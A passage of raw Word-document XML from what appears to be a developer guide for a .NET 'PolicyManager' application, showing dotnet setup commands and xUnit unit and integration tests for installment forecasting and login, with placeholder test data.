    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">dotnet new xunit -n PolicyManager.Tests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">dotnet add PolicyManager.Tests reference PolicyManager.API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">dotnet add PolicyManager.Tests package Moq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">dotnet add PolicyManager.Tests package Microsoft.EntityFrameworkCore.InMemory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">dotnet add PolicyManager.Tests package FluentAssertions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1.1  InvestmentForecastService Tests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">public class InvestmentForecastServiceTests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    private readonly IInvestmentForecastService _sut;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    private readonly AppDbContext _db;</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public InvestmentForecastServiceTests()</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var options = new DbContextOptionsBuilder&lt;AppDbContext&gt;()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            .UseInMemoryDatabase(Guid.NewGuid().ToString())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            .Options;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        _db = new AppDbContext(options);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        _sut = new InvestmentForecastService(_db);</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[Theory]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    [InlineData("Monthly",    12)]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    [InlineData("Quarterly",   4)]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    [InlineData("Half-Yearly", 2)]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    [InlineData("Yearly",      1)]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public async Task ProjectInstallments_ReturnsCorrectCount(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        string type, int expectedCount)</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var policy = new Policy</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StartDate         = new DateTime(2025, 4, 1),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            EndDate           = new DateTime(2030, 3, 31),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            NextInstallmentDate = new DateTime(2025, 4, 1),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            InstallmentType   = type,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            InstallmentAmount = 10000,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            PremiumAmount     = 10000,</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var fyStart = new DateTime(2025, 4, 1);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var fyEnd   = new DateTime(2026, 3, 31);</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var result = InvokeProjectInstallments(policy, fyStart, fyEnd);</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result.Count.Should().Be(expectedCount);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        result.Sum(r =&gt; r.amount).Should().Be(10000m * expectedCount);</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[Fact]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public async Task OneTime_InstallmentGeneratesNoFutureOccurrences()</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 One Time policy should appear at most once in the FY window</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var policy = new Policy</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InstallmentType   = "One Time",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            NextInstallmentDate = new DateTime(2025, 6, 1),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            InstallmentAmount = 500000,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            StartDate = new DateTime(2025, 4, 1),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            EndDate   = new DateTime(2035, 3, 31),</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var result = InvokeProjectInstallments(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            policy,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            new DateTime(2025, 4, 1),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            new DateTime(2026, 3, 31));</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result.Count.Should().BeLessOrEqualTo(1);</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec7-2" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2  Backend — Integration Test: Auth Flow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">public class AuthIntegrationTests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    : IClassFixture&lt;WebApplicationFactory&lt;Program&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    private readonly HttpClient _client;</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public AuthIntegrationTests(WebApplicationFactory&lt;Program&gt; factory)</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_client = factory.WithWebHostBuilder(builder =&gt;</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builder.ConfigureServices(services =&gt;</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 Replace SQL Server with InMemory for tests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                var descriptor = services.SingleOrDefault(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                    d =&gt; d.ServiceType == typeof(DbContextOptions&lt;AppDbContext&gt;));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                if (descriptor != null) services.Remove(descriptor);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                services.AddDbContext&lt;AppDbContext&gt;(o =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                    o.UseInMemoryDatabase("TestDb"));</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}).CreateClient();</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[Fact]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public async Task Login_WithValidCredentials_ReturnsJwt()</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 Arrange: seed a user first via /api/auth/register</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var registerPayload = new {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            FullName = "Test User",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            Email    = "test@test.com",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
